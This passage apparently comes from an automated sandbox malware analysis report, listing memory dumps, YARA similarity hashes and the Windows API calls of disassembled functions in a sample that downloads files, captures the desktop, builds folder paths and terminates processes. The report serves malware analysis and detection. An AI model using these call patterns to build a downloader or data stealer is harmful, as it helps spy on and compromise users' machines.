                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                            • String ID: <
                            • API String ID: 3579039295-4251816714
                            • Opcode ID: 4e18a1507ae43ab5b5e44526324c2cdd39c7c9173c35fe70ab5fcc00f4a3f343
                            • Instruction ID: ed9a982913c17024fe3082564a656340237b0f272088fe1bdc74b0982b79ab00
                            • Opcode Fuzzy Hash: 4e18a1507ae43ab5b5e44526324c2cdd39c7c9173c35fe70ab5fcc00f4a3f343
                            • Instruction Fuzzy Hash: 0F51607190172AEBDB12DFA4DC84A9EB7FDAF58305F044525E905E3261DB30AE41CB90
                            Function 0013F190 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013F1C4
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013F1F2
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0013F206
                            • lstrlen.KERNEL32(00000000), ref: 0013F215
                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 0013F233
                            • StrStrA.SHLWAPI(00000000,?), ref: 0013F261
                            • lstrlen.KERNEL32(?), ref: 0013F274
                            • lstrlen.KERNEL32(00000000), ref: 0013F292
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 0013F2DF
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 0013F31F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$AllocLocal
                            • String ID: ERROR
                            • API String ID: 1803462166-2861137601
                            • Opcode ID: 807d8cf9bf2f48e04b6aa0a6d6377cba27d8e12598a6b4563ab0c54182bcfebb
                            • Instruction ID: e43277c5c5862216a530b74a060ff7ffb718bb27bbe69f199df7c85e07b01377
                            • Opcode Fuzzy Hash: 807d8cf9bf2f48e04b6aa0a6d6377cba27d8e12598a6b4563ab0c54182bcfebb
                            • Instruction Fuzzy Hash: 2851B135D10225EFCB22AF38EC4AA6F77A4AF65305F144269FC4ADB655DB30DC128790
                            Function 0012A010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                            Download Yara Rule
                            APIs
                            • GetEnvironmentVariableA.KERNEL32(013F91B8,00359BD8,0000FFFF), ref: 0012A026
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0012A053
                            • lstrlen.KERNEL32(00359BD8), ref: 0012A060
                            • lstrcpy.KERNEL32(00000000,00359BD8), ref: 0012A08A
                            • lstrlen.KERNEL32(00154C50), ref: 0012A095
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012A0B2
                            • lstrcat.KERNEL32(00000000,00154C50), ref: 0012A0BE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012A0E4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0012A0EF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012A114
                            • SetEnvironmentVariableA.KERNEL32(013F91B8,00000000), ref: 0012A12F
                            • LoadLibraryA.KERNEL32(013FDA78), ref: 0012A143
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                            • String ID:
                            • API String ID: 2929475105-0
                            • Opcode ID: 23902970cb41e25d60c95972b4478d661afe444adfe6131faf527100bae4d337
                            • Instruction ID: 09fb087b20f920fffba5e75960e650f7767b5ef459bec4df129c25950ce4b3e5
                            • Opcode Fuzzy Hash: 23902970cb41e25d60c95972b4478d661afe444adfe6131faf527100bae4d337
                            • Instruction Fuzzy Hash: 0691C130A00B21DFD7329FA4FC45A6A37B9EF54716F800119E805976A2EF75DDA0CB82
                            Function 0013CA30 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013CA92
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013CAC1
                            • lstrlen.KERNEL32(00000000), ref: 0013CAEC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013CB22
                            • StrCmpCA.SHLWAPI(00000000,00154C44), ref: 0013CB33
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: defd84c55a876b34bfb06d73ea0dbc78273901d29bd166f8f710b90fb6c28acf
                            • Instruction ID: 1b5d8c6550d2ada788d05a7217001096b3bd485e78dd7ec9aab6ffc3feea270f
                            • Opcode Fuzzy Hash: defd84c55a876b34bfb06d73ea0dbc78273901d29bd166f8f710b90fb6c28acf
                            • Instruction Fuzzy Hash: 0D611471D01326ABCB11EFB4DD89AAEBBF8AF18701F041129E845F7211D7349D458BE0
                            Function 001443F0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                            Download Yara Rule
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00140EC0), ref: 00144486
                            • GetDesktopWindow.USER32 ref: 00144490
                            • GetWindowRect.USER32(00000000,?), ref: 0014449D
                            • SelectObject.GDI32(00000000,00000000), ref: 001444CF
                            • GetHGlobalFromStream.COMBASE(00140EC0,?), ref: 00144546
                            • GlobalLock.KERNEL32(?), ref: 00144550
                            • GlobalSize.KERNEL32(?), ref: 0014455D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                            • String ID:
                            • API String ID: 1264946473-0
                            • Opcode ID: 4a50de609d66a279f11348f4e5ac72a837911ccc61236ccbd2612d3e783a9a56
                            • Instruction ID: 6b54908f6fb51a4782418d88faf81702cc5584b9cbffc3f223dea6d3f6f96cce
                            • Opcode Fuzzy Hash: 4a50de609d66a279f11348f4e5ac72a837911ccc61236ccbd2612d3e783a9a56
                            • Instruction Fuzzy Hash: C5512E75A10218AFDB11EFA4EC85AEE77BDEF58311F104519F905E7260DB34AE05CBA0
                            Function 0013E180 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcat.KERNEL32(?,013FE400), ref: 0013E1ED
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0013E217
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013E24F
                            • lstrcat.KERNEL32(?,00000000), ref: 0013E25D
                            • lstrcat.KERNEL32(?,?), ref: 0013E278
                            • lstrcat.KERNEL32(?,?), ref: 0013E28C
                            • lstrcat.KERNEL32(?,013EB850), ref: 0013E2A0
                            • lstrcat.KERNEL32(?,?), ref: 0013E2B4
                            • lstrcat.KERNEL32(?,013FD998), ref: 0013E2C7
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013E2FF
                            • GetFileAttributesA.KERNEL32(00000000), ref: 0013E306
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 4230089145-0
                            • Opcode ID: 5518874757bcd226baa9cabbb0d2283ac99810ed6381acc5f4e1c7a482629766
                            • Instruction ID: 59fc7d15b5a30c9d08330f2f3f68023406a535ce62896dfb8a9fc790fd7ec7ed
                            • Opcode Fuzzy Hash: 5518874757bcd226baa9cabbb0d2283ac99810ed6381acc5f4e1c7a482629766
                            • Instruction Fuzzy Hash: 81616D7191022CEBCB65DB64DC45BDDB7B8BF98301F1049A9F60AA3294DB709F858F90
                            Function 00126AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00126AFF
                            • InternetOpenA.WININET(0014CFF4,00000001,00000000,00000000,00000000), ref: 00126B2C
                            • StrCmpCA.SHLWAPI(?,013FE938), ref: 00126B4A
                            • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00126B6A
                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00126B88
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00126BA1
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00126BC6
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00126BF0
                            • CloseHandle.KERNEL32(00000000), ref: 00126C10
                            • InternetCloseHandle.WININET(00000000), ref: 00126C17
                            • InternetCloseHandle.WININET(?), ref: 00126C21
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                            • String ID:
                            • API String ID: 2500263513-0
                            • Opcode ID: c4db8e190d7da0fab99650982212629967504bad9b3fa1d7b8df32ec8cd6a6fb
                            • Instruction ID: d2b1621d7165fed935d070951cd041cf572567368d4ca4e389f31769e1509654
                            • Opcode Fuzzy Hash: c4db8e190d7da0fab99650982212629967504bad9b3fa1d7b8df32ec8cd6a6fb
                            • Instruction Fuzzy Hash: EA415C71A00225ABDB21DB64EC45FAE77ACAB48705F004554FA05E72E0EB70AE548BA4
                            Function 0012BBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0012BC1F
                            • lstrlen.KERNEL32(00000000), ref: 0012BC52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012BC7C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0012BC84
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012BCAC
                            • lstrlen.KERNEL32(00154ADC), ref: 0012BD23
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: a79efed25a294ed10ea46443c25b411829e996eda152ddd969cef77e51dc951e
                            • Instruction ID: b0bcfb43bcbbcc8bd1194b5d11757e8b99f2618e22fd4474b8aca5fe54542e18
                            • Opcode Fuzzy Hash: a79efed25a294ed10ea46443c25b411829e996eda152ddd969cef77e51dc951e
                            • Instruction Fuzzy Hash: 4CA1B230A05225DFCB25DF68F98ABAEB7F4AF44309F188169E805DB661DB31DC61CB50
                            Function 001460F0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 0014613A
                            • std::_Xinvalid_argument.LIBCPMT ref: 00146159
                            • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00146224
                            • memmove.MSVCRT(00000000,00000000,?), ref: 001462AF
                            • std::_Xinvalid_argument.LIBCPMT ref: 001462E0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$memmove
                            • String ID: invalid string position$string too long
                            • API String ID: 1975243496-4289949731
                            • Opcode ID: 0ade17afe72b39002d839f3d465ab547ee246e35f495b307b9cef851e70ee1ae
                            • Instruction ID: 990af7afd964637d2662a4c5d8cc008b542b04b539d3fc9eefedea8b1e84c946
                            • Opcode Fuzzy Hash: 0ade17afe72b39002d839f3d465ab547ee246e35f495b307b9cef851e70ee1ae
                            • Instruction Fuzzy Hash: C6615F70B00204EBDB18CF9CCCE5D6EB7B6EF96708B254919E492877A1D770AD808796
                            Function 00144710 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 95memoryCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 0014472A
                            • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00135099), ref: 00144755
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0014475C
                            • wsprintfW.USER32 ref: 0014476B
                            • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 001447DA
                            • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 001447E9
                            • CloseHandle.KERNEL32(00000000,?,?), ref: 001447F0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
